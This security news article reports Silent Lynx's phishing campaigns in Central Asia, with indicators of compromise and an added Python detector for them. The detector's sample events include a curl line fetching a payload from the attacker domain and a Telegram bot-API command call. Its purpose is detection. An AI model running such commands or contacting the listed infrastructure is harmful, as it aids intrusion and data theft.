Silent Lynx Using PowerShell, Golang, and C++ Loaders in Multi-Stage Cyberattacks


A previously undocumented threat actor known as Silent Lynx has been linked to cyber attacks targeting various entities in Kyrgyzstan and Turkmenistan.

“This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks involved in economic decision making and banking sector,” Seqrite Labs researcher Subhajeet Singha said in a technical report published late last month.

Targets of the hacking group’s attacks include embassies, lawyers, government-backed banks, and think tanks. The activity has been attributed to a Kazakhstan-origin threat actor with a medium level of confidence.

The infections start with a spear-phishing email carrying a RAR archive attachment, which ultimately acts as the delivery vehicle for malicious payloads responsible for granting remote access to the compromised hosts.

The first of the two campaigns, detected by the cybersecurity company on December 27, 2024, uses the RAR archive to launch an ISO file that, in turn, contains a malicious C++ binary and a decoy PDF file. The executable then runs a PowerShell script that uses Telegram bots (named “@south_korea145_bot” and “@south_afr_angl_bot”) for command execution and data exfiltration.

Some of the commands executed via the bots include curl commands to download and save additional payloads from a remote server (“pweobmxdlboi[.]com”) or Google Drive.

The other campaign, in contrast, employs a malicious RAR archive containing two files: a decoy PDF and a Golang executable, the latter of which is designed to establish a reverse shell to an attacker-controlled server (“185.122.171[.]22:8082”).
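As an added example (not Seqrite’s own detection content or code), the Python below hunts for the tradecraft of both campaigns described above over a handful of constructed log events. The only indicators it knows are the ones quoted here: the two Telegram bot usernames, the pweobmxdlboi[.]com download domain, and the 185.122.171[.]22:8082 reverse-shell endpoint. The event schema (type, host, image, parent_image, cmdline, text fields), the Telegram bot-API URL pattern, and every sample event are assumptions made up for the demo; the bot token in the sample script is fake.

```python
"""Hunt for Silent Lynx-style tradecraft in constructed log events.

Illustrative example only. The indicators are those quoted in the article;
the event schema and the events themselves are invented for this demo.
"""
import re


def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 'a[.]b' back into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


# Indicators quoted in the article (defanged there, refanged here).
IOC_DOMAINS = {refang("pweobmxdlboi[.]com")}
IOC_REVERSE_SHELL = (refang("185.122.171[.]22"), 8082)
IOC_BOT_NAMES = {"@south_korea145_bot", "@south_afr_angl_bot"}

# Assumptions for the demo: Telegram's bot API host and the staging hosts
# the article says curl fetched payloads from (Google Drive or the IOC domain).
TELEGRAM_API = "api.telegram.org"
STAGING_HOSTS = {"drive.google.com"} | IOC_DOMAINS
# Bot API calls look like /bot<numeric id>:<token>/<method>; the method names
# here are the ones a C2 script would need (poll commands, send results).
BOT_URL_RE = re.compile(
    r"api\.telegram\.org/bot\d+:[\w-]+/(getUpdates|sendMessage|sendDocument)"
)


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def match_event(ev: dict) -> list[str]:
    """Return the names of every rule the event triggers (possibly none)."""
    hits: list[str] = []
    kind = ev.get("type")
    if kind == "network":
        host = ev.get("host", "").lower()
        if host in IOC_DOMAINS:
            hits.append("ioc_download_domain")
        if (ev.get("dst_ip"), ev.get("dst_port")) == IOC_REVERSE_SHELL:
            hits.append("ioc_reverse_shell")
        # PowerShell talking to the bot API is the C2 channel of campaign one.
        if host == TELEGRAM_API and is_powershell(ev.get("image", "")):
            hits.append("powershell_telegram_c2")
    elif kind == "process":
        image = ev.get("image", "").lower()
        parent = ev.get("parent_image", "").lower()
        cmd = ev.get("cmdline", "").lower()
        # curl spawned by PowerShell to pull a payload from a staging host.
        if (image.endswith("curl.exe") and is_powershell(parent)
                and any(h in cmd for h in STAGING_HOSTS)):
            hits.append("powershell_curl_staging")
    elif kind == "script":  # e.g. PowerShell ScriptBlock logging text
        text = ev.get("text", "")
        if any(bot in text for bot in IOC_BOT_NAMES):
            hits.append("ioc_telegram_bot_name")
        if BOT_URL_RE.search(text):
            hits.append("telegram_bot_api_in_script")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every hit, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in match_event(ev)]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events: four that mimic the two campaigns, two benign.
SAMPLE_EVENTS = [
    {"type": "network", "host": "api.telegram.org", "image": PS,
     "dst_ip": "149.154.167.220", "dst_port": 443},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "parent_image": PS,
     "cmdline": r"curl.exe -s -o C:\Users\Public\update.bin http://pweobmxdlboi.com/x"},
    {"type": "network", "host": "pweobmxdlboi.com",
     "image": r"C:\Windows\System32\curl.exe", "dst_port": 80},
    {"type": "network", "host": "", "image": r"C:\Users\Public\doc.exe",
     "dst_ip": "185.122.171.22", "dst_port": 8082},
    {"type": "script",
     "text": "$bot = '@south_korea145_bot'; Invoke-RestMethod "
             "https://api.telegram.org/bot123456789:AAFakeTokenForDemo/getUpdates"},
    {"type": "network", "host": "api.telegram.org",
     "image": r"C:\Program Files\Google\Chrome\chrome.exe", "dst_port": 443},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "curl.exe https://example.org/"},
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The reverse-shell rule matches on the exact IP:port pair rather than the IP alone so that a shared host used for other traffic does not fire it; the PowerShell-to-Telegram rule is the one worth keeping after the listed infrastructure rotates, since it keys on the technique rather than on an indicator.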

Seqrite Labs said it observed some level of tactical overlap between the threat actor and YoroTrooper (aka SturgeonPhisher), which has been linked to attacks targeting Commonwealth of Independent States (CIS) countries using PowerShell and Golang tools.


“Silent Lynx’s campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell scripts, and Golang implants,” Singha said.

“Their reliance on Telegram bots for command and control, combined with decoy documents and regional targeting, also highlights their focus on espionage in Central Asia and SPECA-based nations.”
